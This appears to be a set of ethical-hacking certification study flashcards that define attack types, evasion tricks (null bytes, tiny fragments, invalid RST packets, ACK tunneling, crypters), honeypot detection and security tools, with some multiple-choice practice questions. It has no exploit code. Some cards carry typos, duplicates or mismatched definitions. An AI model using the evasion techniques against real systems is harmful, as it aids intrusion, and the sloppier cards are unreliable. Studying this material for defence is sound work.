A network administrator received an administrative alert at 3:00 a.m. from the intrusion detection system. The alert was generated because a large number of packets were coming into the network over ports 20 and 21. During analysis, there were no signs of attack on the FTP servers. How should the administrator understand this situation? -False negatives -True negatives -True positives -False positives
Ingress Filtering
A packet filtering technique used by many Internet Service Providers (ISPs) to prevent source address spoofing of Internet traffic, and thus indirectly combat several types of net abuse by making Internet traffic traceable to its true source. It protects against flooding attacks that originate from valid prefixes (IP addresses). It enables the originator to be traced to its true source.
Cloud Auditor
A party that performs an independent examination of cloud service controls with the intent of expressing an opinion thereon. Audits verify adherence to standards through a review of the objective evidence.
GFI LanGuard
A patch management scans your network automatically and also installs and manages security and non-security patches. It supports machines across Microsoft®, MAC OS X® and Linux® operating systems as well as many third-party applications. It allows auto-downloads of missing patches as well as patch rollback, resulting in a consistently configured environment that is protected from threats and vulnerabilities.
Metasploit
A penetration-testing toolkit, exploit development platform, and research tool that includes hundreds of working remote exploits for a variety of platforms. It supports fully automated exploitation of web servers by abusing known vulnerabilities and leveraging weak passwords via Telnet, SSH, HTTP, and SNM. Features of Metasploit that an attacker may use to perform web server attack: - Closed-loop Vulnerability Validation - Phishing Simulations Social Engineering - Manual Brute Forcing - Manual Exploitation - Evade-leading defensive solution Modules Exploit Module - used to encapsulate an exploit using which users target many platforms with a single exploit. Payload Module -o Singles: It is self-contained and completely standalone -o Stagers: It sets up a network connection between the attacker and the victim -o Stages: It is downloaded by stagers modules Auxiliary Module - can be used to perform arbitrary, one-off actions such as port scanning, DoS, and even fuzzing. NOPS Module- "generate" (-b, -h, -s, -t, msf nop opty2) -generate no-operation instructions used for blocking out buffers.
Netsh firewall show config
A pentester gains access to a Windows application server and needs to determine the settings of the built-in Windows firewall. Which command would be used? -Ipconfig firewall show config -Net firewall show config -WMIC firewall show config -Netsh firewall show config
Cloud Consumer
A person or organization that maintains a business relationship with cloud service providers and uses cloud computing services services available for them on each platform o PaaS - database, business intelligence, application deployment, development and testing, and integration o IaaS - storage, services management, CDN (content delivery network), platform hosting, backup and recovery, and compute o SaaS - human resources, ERP (Enterprise Resource Planning), sales, CRM (Customer Relationship Management), collaboration, document management, email and office productivity, content management, financials, and social networ
Side Channel Attack
A physical attack performed on a cryptographic device/cryptosystem to gain sensitive information. Cryptography is generally part of the hardware or software that runs on physical devices such as semi-conductors (includes resistor, transistor, and so on) those interact with and affect various environmental factors
Static Malware Analysis - File Fingerprinting
A process of computing hash value for a given binary code to identify and track data across a network You can use the computed hash value to uniquely identify the malware or periodically verify if any changes are made to the binary code during analysis Use tools like HashMy files to calculate various hash values of the malware file
Packet Sniffing
A program that can capture data packets only from within a given subnet, which means that it cannot sniff packets from another network. Placed on a network in promiscuous mode it can capture and analyze all of the network traffic. It allows an attacker to observe and access the entire network traffic from one point. It can capture data packets containing sensitive information such as passwords, account information, syslog traffic, router configuration, DNS traffic, Email traffic, web traffic, chat sessions, FTP password, etc. Also know as a sniffer
Email Spyware
A program that monitors, records, and forwards all incoming and outgoing email. This works in a stealth mode; users will not be aware of the presence of email spyware on their computer.
Pretty Good Privacy (PGP)
A protocol used to encrypt and decrypt data that provides authentication and cryptographic privacy It is often used for data compression, digital signing, encryption and decryption of messages, emails, files, directories, and to enhance privacy of email communications. The algorithm used for message encryption is RSA for key transport and IDEA for bulk-message encryption. It uses RSA for computing digital signatures and MD5 for computing message digests.
Transport Later Security (TLS)
A protocol used to establish a secure connection between a client and a server and ensure privacy and integrity of information during transmission. uses symmetric key for bulk encryption, asymmetric key for authentication and key exchange, and message authentication codes for message integri It uses the RSA algorithm with 1024-and 2048-bit strengths. protocol consists of two layers; TLS Record Protocol and TLS Handshake Protocol.
Rivest Shamir Adleman (RSA)
A public-key cryptosystem for Internet encryption and authentication Uses modular arithmetic and elementary number theories to perform computations with two large prime numbers Microsoft, Apple, Sun, and Novell build this algorithms into their operating systems
Common Vulnerabilities & Exposures (CVE)
A publicly available and free to use list or dictionary of standardized identifiers for common software vulnerabilities and exposures.
Common Vulnerabilities & Exposures (CVE)
A publicly available and free to use list or dictionary of standardized identifiers for common software vulnerabilities and exposures. List of standardized identifiers for common SW vulnerabilities & exposures One identifier for one vulnerability or exposure One standardized description for each vulnerability or exposure A dictionary rather than a database How disparate databases and tools can "speak" the same language The way to interoperability and better security coverage A basis for evaluation among services, tools, and databases Free for public to download and use Industry-endorsed via the CVE Numbering Authorities, CVE Board, and numerous products and services that include CVE
Remote Triggered Black Hole Filtering (RTBHF)
A routing technique, is used to mitigate DoS attack by using Border Gateway Protocol (BGP). the router performs Black hole filtering using null o interfaces.
Shoden
A search engine that provides information about all the internet connected devices such as routers, traffic lights, CCTV cameras, servers, smart home devices, industrial devices, etc. Attackers can make use of this tool to gather information such as IP address, hostname, ISP, device's location and the banner of the target IoT device.
IoT Framework Security Considerations : Cloud Platform
A secure framework for the this component should include encrypted communications, strong authentication credentials, secure web interface, encrypted storage, automatic updates and so on
Public Key Infrastructure (PKI)
A security architecture developed to increase the confidentiality of information exchanged over the insecure Internet. It includes hardware, software, people, policies, and procedures required to create, manage, distribute, use, store, and revoke digital certificates. In cryptography, this helps to bind public keys with corresponding user identities by means of a Certificate Authority (CA). cryptosystems distribute them within digital signatures.
Access Control Attack: Client Mis-association
A security flaw that can occur when a network client connects with a neighboring AP This is because the WLAN signals travel in the air, through walls and other obstructions. Happen for a number of reasons such as -misconfigured clients -insufficient coverage of corporate Wi-Fi -lack of Wi-Fi policy restrictions on use of internet in the office - ad-hoc connections that administrators do not manage very often -attractive SSIDs
Virus
A self-replicating program that produces its code by attaching copies of itself to other executable codes and operates without the knowledge or desire of the user. It is contagious and can contaminate other files; however, it can infect outside machines only with the assistance of computer users. transmitted through file downloads, infected disk/flash drives, and as email attachments
Bluetooth Stack
A short-range wireless communication technology that replaces the cables connecting portable or fixed devices while maintaining high levels of security. It allows mobile phones, computers, and other devices to exchange information. Two Bluetooth-enabled devices connect through the pairing technique. Has two parts, general purpose and embedded system
Polymorphic Shell Code
A signature-based network intrusion detection system (NIDS) identifies an attack by matching attack signatures with incoming and outgoing data packets This attack includes multiple signatures making it difficult to detect the signature. Attackers encode the payload using some technique and then place a decoder before the payload. As a result of this, the shellcode is completely rewritten each time it is sent evading detection. attackers hide their shellcode (attack code) by encrypting it with an unknown encryption algorithm and including the decryption code as part of the attack packet.
Patch
A small piece of software designed to fix problems, security vulnerabilities, and bugs, and improve the usability or performance of a computer program or its supporting data.
Web Applications
A software programs that run on web browsers and act as the interface between users and web servers through web pages. Though these have certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking,
Crypters
A software which is used by hackers to hide virus, keyloggers, or tools in any kind of files so that they do not easily get detected by antiviruses. Asoftware that encrypts the original binary code of the .exe file. Tools -BitCryer -SwayzCryptor - Hidden Sight Crypter - Cypherx - Java Crypter - BetaCrypt - Spartan Crypter
Firewalls
A software-or hardware-based system located at the network gateway that protects the resources of a private network from unauthorized access of users on other networks. They are placed at the junction or gateway between the two networks, which is usually a private network and a public network such as the Internet It examines all messages entering or leaving the Intranet and blocks those that do not meet the specified security criteria. Always install away from the rest of the network, so that none of the incoming request can get direct access to a private network resource
Direct Sequence Spread Spectrum (DSSS)
A spread spectrum technique that multiplies the original data signal with a pseudo random noise spreading code. Also referred to as a data transmission scheme or modulation scheme, the technique protects signals against interference or jamming.
Data Encryption Standard (DES)
A standard for data encryption that uses a secret key for both encryption and decryption (symmetric cryptosystem) o Archetypal block cipher o 64-bit secret key of which 56 bits are generated randomly and other 8 bits help in error detection. o Use 3DES for more encryption
Dipole Antenna
A straight electrical conductor measuring half of a wavelength from end to end and connected at the RF feed line's center. Also called as a doublet, the antenna is bilaterally symmetrical, so it is inherently a balanced antenna. This kind of antenna feeds on a balanced parallel-wire RF transmission line.
Distributed Network Attack (DNA)
A technique used for recovering password-protected files that utilizes the unused processing power of machines across the network to decrypt passwords. The program combines the processing capabilities of all the clients connected to the network and uses it to crack the password. Using unused processing power of machines across the network to crack passwords. Think "botnet pwd attack" Features : o Reads statistics and graphs easily o Adds user dictionaries to crack the password o Optimizes password attacks for specific languages o Modifies the user dictionaries o Comprises the stealth client installation functionality o Automatically updates client while updating the DNA server
Short-range communication : WI-Fi
A technology that is widely used in wireless local area networking or LAN. Presently, the most common standard that is used in homes or companies is 802.11n which offers a maximum speed of 600 Mbps and range of approximately 50 meters.
Disk Encryption
A technology, which protects the confidentiality of the data stored on disk by converting it into an unreadable code using disk encryption software or hardware, thus preventing unauthorized users from accessing it. It provides confidentiality and privacy using passphrases and hidden volumes. It works in a manner similar to text-message encryption and protects data even when the OS is not active software scrambles the information burned on the disk into an illegible code. It is only after decryption of the disk information that one can read and use it.
Ransomware
A type of a malware which restricts access to the computer system's files and folders and demands an online ransom payment to the malware payment to the malware creator in order to remove the restrictions The displayed messages pretend to be from companies or law enforcement personnel falsely claiming that their system is being used for illegal purposes or contains illegal content
Rainbow Table Attack
A type of cryptography attack where an attacker uses a rainbow table for reversing cryptographic hash functions. It uses the cryptanalytic time-memory trade-off technique, which requires less time than some other techniques. It uses already-calculated information stored in memory to crack the cryptography
RFC 3704 filtering
A type of ingress filtering for multi-homed network to limit the DoS attack. it denies traffic with a spoofed address to access the network and ensure the trace to its source address A "bogon list" consists of all unused or reserved IP addresses that should not come in from the Internet
Hash-based Message Authentication Code (HMAC)
A type of message authentication code (MAC) that uses a cryptographic key along with a cryptographic hash function. It is widely used to verify the integrity of the data and authentication of a message. This algorithm includes an embedded hash function such as SHA-1 or MD5. The strength of the this depends on the embedded hash function, key size, and the size of the hash output.
Host-Based Assesment
A type of security check that involves carrying out a configuration-level check through the command line. Scanners assess systems to identify vulnerabilities such as incorrect registry and file permissions, as well as software configuration errors.
Blowfish
A type of symmetric block cipher algorithm, designed to replace DES or IDEA algorithms. It is a 16-round Feistel cipher working on 64-bit blocks. However, unlike DES, it can have varying key sizes ranging from 32 bits to 448 bits. Two parts to this algorithm. The first part handles the expansion of the key. The second part actually encrypts the data.
3G/4G Hotspot
A type of wireless network that provides Wi-Fi access to Wi-Fi-enabled devices including MP3 players, notebooks, tablets, cameras, PDAs, netbooks, and more.
Access Control Attack: Misconfigured AP
A user improperly configures any of the critical security settings at any of the APs Some of the key elements that play an important role in this kind of attack include: o SSID Broadcast o Weak/default password o Configuration Error
Scheduled Tasks
A user with administrator privileges can use these utilities in conjunction with the Task Scheduler to schedule programs or scripts that can be executed at a particular date and time.
Footprinting Types
Active: requires attacker to touch the device, network, or resource Passive: measures to collect information from publicly accessible sources
Web Server Security Tools
Acunetix Web Vulnerability Scanner -scans websites and detects vulnerabilities. - detects application languages, web server types, and smartphone-optimized sites -crawls and analyzes different types of websites including HTML5, SOAP and AJAX. -supports scanning of network services running on the server and port scanning of the web server. Fortify WebInspect Retina CS Nscan NetIQ Secure Configuration Manager SAINT Scanner Infiltrator
Advantages and Disadvantages of Wireless Networks:
Advantages o Installation is fast and easy and eliminates wiring through walls and ceilings o It is easier to provide connectivity in areas where it is difficult to lay cable o Access to the network can be from anywhere within range of an access point o Public places like airports, libraries, schools or even coffee shops offer you constant Internet connections using Wireless LAN Disadvantages o Security is a big issue and may not meet expectations o As the number of computers on the network increases, the bandwidth suffers o Wi-Fi enhancements can require new wireless cards and/or access points o Some electronic equipment can interfere with the Wi-Fi networks
Advantages and Disadvantages of IaaS
Advantages: o Dynamic infrastructure scaling o Guaranteed uptime o Automation of administrative tasks o Elastic load balancing (ELB) o Policy-based services o Global accessibility Disadvantages: o Software security is at high risk (third-party providers are more prone to attacks) o Performance issues and slow connection speed
Advantages and Disadvantages of SaaS
Advantages: o Low cost o Easier administration o Global accessibility o Compatible (no specialized hardware or software is required) Disadvantages: o Security and latency issues o Total dependency on the Internet o Switching between SaaS vendors is difficult
Advantages and Disadvantages of PaaS
Advantages: o Simplified deployment o Prebuilt business functionality o Lower risk o Instant community o Pay-per-use model o Scalability Disadvantages: o Vendor lock-in o Data privacy o Integration with the rest of the system applications
Exploit Kit
Also know as a crimeware toolkit -It is used to exploit security loopholes found in software applications, by distributing malware such as Trojans, spywares, backdoors, bots, buffer overflow scripts. They are used against users running insecure or outdated software applications on their systems. come with pre-written exploit codes. Thus it is easy to use for an attacker who is not an IT or security expert.
Availability Attacks
Aim at obstructing the delivery of wireless services to legitimate users, either by crippling those resources or by denying them access to WLAN resources. This attack makes wireless network services unavailable to legitimate users Types o AP Theft -Physically removing an AP from its installed location. o Disassociation Attacks -Destroying the connectivity between an AP and client, to make the target unavailable to other wireless devices. o EAP-Failure -Observing a valid 802.1X EAP exchange, and then sending the client a forged EAP-Failure message. o Beacon Flood -Generating thousands of counterfeit 802.11 beacons to make it hard for clients to find a legitimate AP. o Denial-of-Service o De-authenticate Flood o Routing Attacks o Authenticate Flood o ARP Cache Poisoning Attack o Power Saving Attacks o TKIP MIC Exploit
Short-range communication : Bluetooth low energy
Also known as Bluetooth Smart is a wireless personal area network. This technology is designed to provide applications in various sectors like healthcare, security, entertainment, fitness, etc.
Access Control Attack: Promiscuous clients
Allow an attacker to transmit target network traffic through a fake AP. It is very similar to the evil twin threat on wireless network, in which an attacker launches an AP that poses as an authorized AP by beaconing the WLAN's SSID
Nessus Pro
An assessment solution for identifying vulnerabilities, configuration issues, and malware that attackers use to penetrate networks. -supports various technologies such as operating systems, network devices, hypervisors, databases, tablets/phones, web servers and critical infrastructure Features: High-speed asset discovery Vulnerability assessment Malware/Botnet detection Configuration and compliance auditing Scanning and auditing of virtualized and cloud platforms
Denial of Service (DoS)
An attack on a computer or network that reduces, restricts, or prevents accessibility of system resources to its legitimate users. Attackers flood a victim's system with non-legitimate service requests or traffic to overload its resources, bringing the system down, leading to unavailability of the victim's website or at least significantly slowing the victim's system or network performance.
Intranet DNS Spoofing
An attack on a switched LAN with the help of the ARP poisoning technique. To perform this attack, the attacker must be connected to the LAN and be able to sniff the traffic or packets. An attacker who succeeds in sniffing the ID of the DNS request from the intranet can send a malicious reply to the sender before the actual DNS server. The attacker poisons the router by running arpspoof/dnsspoof to redirect DNS requests of clients to the attacker's machine. When a client (Rebecca) sends a DNS request to the router, the poisoned router sends the DNS request packet to the attacker's machine. Upon receiving the DNS request, the attacker sends a fake DNS response that redirects the client to a fake website set up by the attacker.
Wireless ARP Poisoning
An attack technique that exploits the lack of verification. In this technique, the ARP cache maintained by the OS with the wrong MAC addresses is corrupted. An attacker performs this by sending an ARP Replay pack constructed with a wrong MAC addres Cain & Abel
Smurf Attack
An attack that broadcasts a ping request to computers yet changes the address so that all responses are sent to the victim. The attacker spoofs the source IP address with the victim's IP address and sends large number of ICMP ECHO request packets to an IP broadcast network This causes all the hosts on the broadcast network to respond to the received ICMP ECHO requests. These responses will be sent to the victim's machine since the IP address is spoofed by the attacker. This causes significant traffic to the actual victim's machine, ultimately leading the machine to crash.
Detecting Honeyd Honeypot
An attacker can identify the presence of honeyd honeypot by performing time based TCP Fingerprinting methods (SYN Proxy behavior). The following picture depicts the difference between a response to a normal computer vs. the response of honeyd honeypot for the manual SYN request sent by an attacke
Detecting presence of Bait and Switch Honeypots:
An attacker can identify the presence of this kind of honeypots by looking at specific TCP/IP parameters like the Round-Trip Time (RTT), the Time To Live (TTL), the TCP timestamp, etc
AP MAC Spoofing
An attacker can spoof the MAC address of the AP by programming a rogue AP to advertise the same identity information as that of the legitimate AP. An attacker connected to the AP as the authorized client can have full access to the network This type of attack succeeds when the target wireless network uses MAC filtering to authenticate their clients (users).
Polymorphic Shellcode
An attacker hides the shellcode by encrypting it with an unknown encryption algorithm and by including the decryption code as part of the attack packet. He encodes the payload and then places a decoder before the payload. Identify the type of attack executed by attacker. -Post-Connection SYN -Preconnection SYN -ASCII Shellcode -Polymorphic Shellcode
What is passive session hijacking?
An attacker hijacks a session but sits back and watches and records all the traffic that is being sent forth. uses sniffers on the network, allowing attackers to obtain information such as user IDs and passwords. The attacker can later use this information to log on as a valid user and enjoy the privileges.
Export a Value via Regex Attack
An attacker performs SQL injection using regular expressions on a known table to learn values of confidential information such as passwords.
Bypassing firewall through content
An attacker sends an e-mail containing a malicious Microsoft Office document to target WWW/FTP servers and embed Trojan horse files as software installation files, mobile phone software, and so on to lure a user to access them. Identify by which method the attacker is trying to bypass the firewall. -Bypassing firewall through content -Bypassing firewall through MITM attack -Bypassing WAF using XSS attack -Bypassing firewall through external systems
UDP Flood Attack
An attacker sends spoofed UDP packets at a very high packet rate to a remote host on random ports of a target server and by using a large source IP range. This causes server to check repeatedly for nonexistent applications at the ports. Legitimate applications are inaccessible by the system and gives an error reply with an ICMP "Destination Unreachable" packet This attack consumes network resources and available bandwidth, exhausting the network until it goes offline.
Ping of Death Attack
An attacker tries to crash, destabilize, or freeze the target system or service by sending malformed or oversized packets larger than the maximum 65,535 bytes using a simple ICMP ping command. For instance, the attacker sends a packet that has a size of 65,538 bytes to the target web server. This size of the packet exceeds the size limit prescribed by RFC 791 IP, which is 65,535 bytes. The reassembly process by the receiving system might cause the system to crash. In this type of attacks, the attacker's identity could be easily spoofed, and the attacker might not need detailed knowledge of the target machine he/she was attacking, except its IP address
Web Server Password Cracking
An attacker tries to exploit weaknesses to hack well-chosen passwords Attacker target SMTP and FTP servers, Web shares' SSH tunnel, and Web form authentication cracking Techniques used -Guessing -Dictionary attack -has predefined file of words of various combinations, and an automated program -Brute Force Attack -Hybrid Attack - uses both dictinary, brute force, symbols and numbers (easiest)
Evasion Technique: Null Byte
An attacker uses null byte (%00) character prior to a string in order to bypass detection mechanism
Challenge-Handshake Authentication Protocol (CHAP)
An authentication mechanism used by Point to Point protocol (PPP) servers in order to authenticate or validate the identity of remote clients or network hosts. It is more secure and effective as compared to Password Authentication Procedure (PAP) as it regularly verifies the identity of the client using three-way handshake and provides protection against replay attacks
Extensible Authentication Protocol (EAP)
An authentication protocol that was originally designed for Point-to-Point connections. It is used as an alternative to CHAP and PAP authentication protocols as it is more secure and supports different authentication mechanisms such as passwords, smart tokens, OTPs (one-time passwords), Secure ID card, digital certificates and public key encryption mechanism
Wavelet Profiling
An autonomous process of detecting DoS/DDoS attack by analysis of input signals. - it evaluates the traffic and filter on a certain scale whereas adaptive threshold techniques are used to detect DoS attack. Technique analyzes network traffic in terms of spectral components. Analyzing each spectral window's energy determines the presence of anomalies. These techniques check frequency components present at a specific time and provide a description of those components. Presence of an unfamiliar frequency indicates suspicious network activity.
Cloud Broker
An entity that manages cloud services regarding use, performance, and delivery, and maintains the relationship between CSPs and cloud consumers Provides these services o Service Intermediation -Improves a given function by a specific capability and provides value-added services to cloud consumers. o Service Aggregation -Combines and integrates multiple services into one or more new services. o Service Arbitrage -Similar to service aggregation, but here the services being aggregated are not fixed (cloud broker has the flexibility to choose services from multiple agencies)
Vulnerability Assessment
An examination of the ability of a system or application, including current security procedures and controls, to withstand assault. scan networks for known security weaknesses.
Bypass Blocked Sites via Anonymous Website Surfing Sites
Anonymous web-surfing sites help to browse the Internet anonymously and unblock blocked sites (i.e., evade firewall restrictions). Anonymizer's VPN routes all the traffic through an encrypted tunnel directly from your laptop to secure and hardened servers and network. It then masks the real IP address to ensure complete and continuous anonymity for all online activities.
Netcraft
Anti-phishing tool - provides updated information about the sites users visit regularly and blocks dangerous sites.
Open System Authentication Process:
Any wireless client that wants to access a Wi-Fi network sends a request to the wireless AP for authentication.
What is a CRIME (Compression Ratio Info-Leak Made Easy) attack?
Application level technique Attack is a client-side attack, which exploits the vulnerabilities present in data compression feature of protocols such as SSL/TLS, SPDY, and HTTPS. The possibility of mitigation against HTTPS compression is less which makes this vulnerability even more dangerous than other compression vulnerabilities To perform this attack, an attacker has to use social engineering techniques to trick the victim into clicking a malicious link.When the victim clicks the malicious link, it either injects malicious code into the victim's system or redirects the victim to a malicious website.
Man-in-the-Browser Attack
Application level technique Attack requires a Trojan, already deployed on the target machine. The trojan can either change the proxy settings or redirect all traffic through the attacker. It can also intercept the process between the browser and its security mechanism An attacker uses previously installed Trojan to act between the browser and its security mechanism, capable of modifying web pages, and modifying transaction content or inserting additional transactions, everything invisible to both the user and web application The main objective of this attack is financial theft by manipulating the transactions of Internet banking systems. used on the client-side
SSDP
Attacker uses ___scanning to detect UPnP vulnerabilities that may allow him/her to launch buffer overflow or DoS attacks.
What is Session Fixation?
Application level technique Attacker issuing a session ID to the user's browser, forcing it to use the chosen session ID. This attack refers to session fixation attack because an attacker fixes the user's session ID in advance, instead of generating it randomly at the time of login. An attacker uses various techniques to perform this attack such as; - Session token in the URL argument - Session token in a hidden form field - Session ID in a cooki
What is a Cross-SIte Scripting (XSS ) attack?
Application level technique Enables attackers to inject malicious client side scripts into the web pages viewed by other users. This type of attack occurs when a dynamic Web page gets malicious data from the attacker and executes it on the user's system. Web sites that create dynamic pages do not have control over how the clients read their output. Thus, attackers can insert a malicious JavaScript, VBScript, ActiveX, HTML, or Flash applet into a vulnerable dynamic page. That page will then execute the script on the user's machine and collect personal information of the user, steal cookies, redirect users to unexpected Web pages, or execute any malicious code on the user's system. - exploits the trust a user has for a particular website
Session Hijacking Using Forbidden Attack
Application level technique Is a type of man-in-the-middle attack which is possible when a cryptographic nonce is reused while establishing a HTTPS session with the server This attack exploits vulnerability through TLS implementation that incorrectly reuses the same nonce when data is encrypted (using AES-GCM) during the TLS handshake. Repeating the same nonce during the TLS handshake allows an attacker to monitor and hijack the connection.
What is a Session Replay Attack?
Application level technique The attacker listens to the conversation between the user and the server and captures the authentication token of the user. Once the authentication token is captured, the attacker replays the request to the server with the captured authentication token to dodge the server and gains unauthorized access to the server. -reuses a a valid session Id to spoof a client
Predicting Session Token
Application level technique The process of observing currently occupied session IDs by the client. By observing common and variable parts of the session key, an attacker can guess the next session key. Usually, attackers can predict session IDs generated by weak algorithms and impersonate a web site user. Attackers perform analysis of variable section of session IDs to determine the existence of a pattern. She/he performs this analysis either manually or by using various cryptanalytic tools.
What is a Man-in-the-Middle Attack?
Application level technique This attack is used to intrude into an existing connection between systems and to intercept messages being exchanged. Attackers use different techniques and split the TCP connection into two connections - client-to-attacker connection and attacker-to-server connection. After the successful interception of TCP connection, an attacker can read, modify, and insert fraudulent data into the intercepted communication. In the case of an http transaction, the TCP connection between the client and the server becomes the target.
Bypass Firewall via ACK Tunneling
As ACK packets are sent after establishing a session, ACK traffic is considered legitimate. Another reason why filtering of ACK packets is ignored is to lessen the workload of firewalls, as there can be many ACK packets for one SYN packet. This allows tunneling a backdoor application with TCP packets with the ACK bit set. The ACK bit acknowledges the receipt of a packet. As stated earlier, some firewalls do not check packets with the ACK bit set, because ACK bits are supposed to be used in response to legitimate traffic that has already been allowed to pass through. Attackers use this as an advantage in ACK tunneling. Tools such as AckCmd (http://ntsecurity.nu) use ACK tunneling.
Unpatched Servers
As these are a hub for the attackers, they serve as an entry point into the network. Updating software regularly and maintaining systems properly by patching and fixing bugs can help in mitigating vulnerabilities caused due to unpatched servers.
Steps involved in the Forbidden attack
Attacker monitors the connection between the victim and web server and sniffs the nonce from the TLS handshake messages. Attacker generates authentication keys using the nonce and hijacks the connection. All the traffic between victim and web server flows through the attacker's machine. Now, the attacker injects JavaScript code or web fields into the transmission towards victim. Victim reveals sensitive information like bank account no, passwords, social security numbers, etc. to the attacker.
NTP Enumeration
Attacker queries NTP server to gather valuable information such as: List of hosts connected to NTP server Clients IP addresses in a network, their system names and OSs Internal IPs can also be obtained if NTP server is in the DMZ NTP enumeration commands include -ntpdate -collects the number of time samples from a number of time sources. - ntptrace -determines from where the NTP server gets time and follows the chain of NTP servers back to its prime time source. -ntpdc, -queries the ntpd daemon about its current state and requests changes in that state. -ntpq -monitors NTP daemon ntpd operations and determine performance.
Application Layer Attack
Attacker tries to exploit the vulnerabilities in application layer protocol or in the application itself to prevent the access of the application to the legitimate user. -Application resources will be consumed by opening up connections and then leaving them open until no new connections can be made. Attacks result in the loss of services of a particular network, such as emails, network resources, temporary ceasing of applications and services, and so on. These attacks destroy a specific aspect of an application or service and are effective with one or few attacking machines producing a low traffic rate (very hard to detect and mitigate). The magnitude of attack is measured in requests-per-second (rps).
Session Hijacking using Session Riding
Attackers "ride" an active computer session by sending an email or tricking users to visit a malicious webpage, during login, to an actual target site. When users click the malicious link, the website executes the request as if the user had already authenticated it.
Impact of Web Server Attacks
Attackers can cause various kinds of damages to an organization by attacking a web server -Compromise of User Account -Website Defacement -Secondary Attacks from the website -Root access to other apps/servers -Data tampering/theft
Detecting Honeypots running on VMware:
Attackers can identify the instances that are running on the VMWare virtual machine by analyzing the MAC address. -By looking at the IEEE standards for the current range of MAC addresses assigned to VMWare Inc., an attacker can identify the presence of VMWare based honeypots.
Detecting presence of User-Mode Linux (UML):
Attackers can identify the presence of UML honeypot by analyzing the files such as /proc/mounts, /proc/interrupts, and /proc/cmdline, etc. which contain UML-specific information
File System Permissions
Attackers can take advantage of this technique to replace original binaries with malicious binaries to escalate privileges.
Invalid RST Packets
Attackers can use this feature to elude detection by sending RST packets with an invalid checksum, which causes the IDS to stop processing the stream because the IDS thinks the communication session has ended. attackers to continue to communicate with the end host while confusing the IDS because the end host accepts the packets that follow the RST packet with an invalid checksum
Tiny Fragments
Attackers create tiny fragments of outgoing packets forcing some of the TCP packet's header information into the next fragment. The IDS filter rules that specify patterns will not match with the fragmented packets due to broken header information. The attack will succeed if the filtering router examines only the first fragment and allow all the other fragments to pass through. This attack is used to avoid user-defined filtering rules and works when the firewall checks only for the TCP header information.
Identify Entry Points for User Input
Attackers examine URL, HTTP Header, query string parameters, POST data, and cookies to determine all user input fields. Use the following tools to analyze the web application: httprint (http://www.net-square.com) Burp Suite (https://portswigger.net) WebScarab (https://www.owasp.org) OWASP Zed Attack Proxy (https://www.owasp.org) GNU Wget (https://www.gnu.org)
Rubber Hose Attack
Attackers extract cryptographic secrets (e.g. the password to an encrypted file) from a person by coercion or torture.
Side Channel Attack
Attackers extract info about encryption keys by observing the emission of signal
Application Layer Attacks
Attackers find flaws in this compressed data and perform attacks; even the IDS signatures cannot identify attack code within data thus compressed.
Social Engineered Click-jacking:
Attackers inject malware into legitimate-looking websites to trick users by clicking them. When clicked, the malware embedded in the link executes without the knowledge or consent of the user.
SQL Injection Attacks
Attackers insert malicious code (generated using special characters) into a standard SQL code to gain unauthorized access to a database and ultimately to other confidential information. It generally occurs when an application uses the input to construct dynamic SQL statements
Reply attack
Attackers intercept legitimate messages from a valid communication and continuously send the intercepted message to the target device to perform a denial-of-service attack or delay it in order to manipulate the message or crash the target device.
Vulnerability Stack
Attackers make use of vulnerabilities of one or more elements among the seven levels to exploit them and gain unrestricted access to an application or to the entire network. Layer 7 -Business Logic flaws Technical Vulnerability -exploit vulnerabilities by performing input validation attacks such as XSS Layer 6 - Open source/Commercial -Third-party components are services that integrate with the website to achieve certain functionality -exploit this redirection and use this as a medium/pathway to enter Amazon.com and exploit it. Layer 5 - Apache/ Microsoft IIS -Attackers can employ footprinting on a webserver, which hosts the target website and grab banners that contain information such as the web server name and its version Layeer 4 - Oracle/ MysQL/ MS SQL -Databases store sensitive user information such as user IDs, passwords, phone numbers, and other particulars. Layer 3 - Windows/ Linux /OS X -Attackers scan an operating system to find open ports and vulnerabilities and develop viruses/backdoors to exploit them. Layer 2 - Routers / Switches -Attackers flood these switches with huge number of requests that exhaust the CAM table, leading it to behave like a hub. Layer 1 - IDS/IPS -intrusion detection systems, so that while exploiting the target, the IDS/IPS does not trigger any alarm
Static Malware Analysis - Identifying packaging/ Obfuscation methods
Attackers often use packers to compress, encrypt, or modify a malware executable file to avoid detection It completes the task for the reverse engineers in finding out the actual program logic and other metadata via static analysis
Phishing Attacks
Attackers perform this attack by sending an email containing a malicious link and tricking the user to click it. Clicking the link will redirect the user to a fake website that looks similar to the legitimate website.
Forged Malicious Devices
Attackers replace authentic IoT devices with malicious devices, if they have physical access to the network.
Inverse TCP Flag Scanning
Attackers send TCP probe packets with a TCP flag (FIN, URG, PSH) set, or with no flags. -When the port is open, the attacker does not get any response from the host, whereas when the port is closed, he or she receives the RST from the target host -All closed ports on the targeted host will send an RST/ACK response. -Since operating systems such as the Windows completely ignore the RFC 793 standard, you cannot see the RST/ACK response when connected to a closed port on the target host. -Good for unix not windows Advantages -Avoids many IDS and logging systems, highly stealthy uses FIN, URG or PSH flag. Open gives no response. Closed gives RST/ACK -nmap -sN (Null scan) -nmap -sF (FIN scan)
Mobile-Based Social Engineering
Attackers trick the users by imitating popular applications and creating malicious mobile applications with attractive features and submitting them with the same name to the major app stores.
Find & Bypass Admin Panel of a Website
Attackers try to find the admin panel of a website using simple Google dorks and bypass the administrator authentication using SQL injection attack An attacker generally uses Google dorks to find the URL of an admin panel
Out-of-Band SQL Injection
Attackers use different communication channels (such as database email functionality, or file writing and loading functions) to perform the attack and obtain the results difficult to perform because the attacker needs to communicate with the server and acquire features of the database server used by the web application. Attackers use DNS and HTTP requests to retrieve data from the database server
Overlapping Fragments
Attackers use overlapping fragments technique to evade IDS. In this technique, attackers generate a series of tiny fragments with overlapping TCP sequence numbers.
SSH Brute Force Attack
Attackers use the SSH protocols to create an encrypted SSH tunnel between two hosts in order to transfer unencrypted data over an insecure network. The attacker scans the entire SSH server using bots (performs TCP port 22 port scan) to identify possible vulnerabilities Attackers use tools such as Nmap and ncrack on a Linux platform to perform this attack
Web Services Footprinting Attack
Attackers use the Universal Business Registry (UBR) as major source to gather information of web services, as it is very useful for both businesses and individuals Attackers can footprint a web application to obtain any or all of these UDDI information structures -XML Query -XML Response
Hidden Field Manipulation
Attackers use these against e-commerce websites, as most of these sites have hidden fields in price and discount specifications. the selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST). HTML can also store field values as hidden fields, HTML code GET or POST
HackRF One
Attackers use this tool to perform attacks such as BlueBorne or AirBorne attacks such as replay, fuzzing, jamming, etc.
Rule-based Attack
